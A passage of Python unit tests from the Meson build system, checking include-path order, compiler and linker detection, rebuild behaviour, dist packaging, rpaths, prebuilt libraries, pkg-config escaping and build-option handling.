if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libefile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <[email protected]>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
@mock.patch.dict(os.environ)
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
# pkg-config and pkgconf does not respect the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
# When running under Travis Mac CI, the file updates seem to happen
# too fast so the timestamps do not get properly updated.
# Call this method before file operations in appropriate places
# to make things work.
def mac_ci_delay(self):
if is_osx() and is_ci():
import time
time.sleep(1)
def test_options_with_choices_changing(self) -> None:
"""Detect when options like arrays or combos have their choices change."""
testdir = Path(os.path.join(self.unit_test_dir, '84 change option choices'))
options1 = str(testdir / 'meson_options.1.txt')
options2 = str(testdir / 'meson_options.2.txt')
# Test that old options are changed to the new defaults if they are not valid
real_options = str(testdir / 'meson_options.txt')
self.addCleanup(os.unlink, real_options)
shutil.copy(options1, real_options)
self.init(str(testdir))
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'b')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
self.wipe()
self.mac_ci_delay()
# When the old options are valid they should remain
shutil.copy(options1, real_options)
self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c'])
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'c')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b', 'c'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
